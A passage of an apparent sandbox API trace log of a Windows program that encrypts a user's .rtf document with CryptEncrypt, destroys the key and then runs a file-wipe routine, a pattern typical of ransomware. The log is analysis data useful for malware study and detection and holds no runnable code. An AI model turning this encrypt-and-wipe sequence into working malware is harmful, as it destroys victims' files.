wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.095] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.096] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x4284, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x4290) returned 1 [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.096] CharLowerBuffW (in: lpsz="byte[17041]", cchLength=0xb | out: lpsz="byte[17041]") returned 0xb [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.097] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.097] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.098] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9617c8*, pdwDataLen=0x6ae220*=0x4284, dwBufLen=0x4290 | out: pbData=0x9617c8*, pdwDataLen=0x6ae220*=0x4290) returned 1 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.098] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.098] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.098] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.098] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.098] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.099] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.099] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.101] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.101] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.101] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.101] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.101] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.101] CryptDestroyKey (hKey=0x7c2200) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.102] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.102] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.102] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.102] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.102] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.102] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.103] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.103] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.103] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.103] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.104] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.104] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.104] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.104] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.106] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.106] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0035.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0xf3cf07c0, ftLastWriteTime.dwHighDateTime=0x1d5be20, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0x7c2240 [0035.107] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.107] CharLowerBuffW (in: lpsz="byte[17028]", cchLength=0xb | out: lpsz="byte[17028]") returned 0xb [0035.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.107] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.107] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.107] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.107] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.108] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: 